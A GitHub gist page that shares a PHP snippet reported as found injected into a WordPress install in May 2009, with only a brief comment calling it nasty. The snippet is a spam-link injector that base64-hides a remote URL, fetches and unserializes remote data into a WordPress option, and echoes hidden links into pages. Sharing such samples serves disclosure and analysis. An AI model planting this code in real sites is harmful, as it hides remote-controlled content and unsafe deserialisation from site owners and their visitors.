Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Found injected into a WordPress install, May 13, 2009
<?php /* wp_remote_fopen procedure */ $wp_remote_fopen='aHR0cDovL3F3ZXRyby5jb20vc3MvdGVzdF8xNQ==';
$blarr=get_option('cache_vars');
if(trim(wp_remote_fopen(base64_decode($wp_remote_fopen).'.md5'))!=md5($blarr)){ $blarr=trim(wp_remote_fopen(base64_decode($wp_remote_fopen).'.txt'));
update_option('cache_vars',$blarr);
} $blarr=unserialize(base64_decode(get_option('cache_vars')));
if($blarr['hide_text']!='' && sizeof($blarr['links'])>0){ if($blarr['random']){ $new='';
foreach(array_rand($blarr['links'],sizeof($blarr['links'])) as $k) $new[$k]=$blarr['links'][$k];
$blarr['links']=$new;
} $txt_out='';
foreach($blarr['links'] as $k=>$v) $txt_out.='<a href="'.$v.'">'.$k.'</a>';
echo str_replace('[LINKS]',$txt_out,$blarr['hide_text']);
} /* wp_remote_fopen procedure */ ?><?php
// very very nasty
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.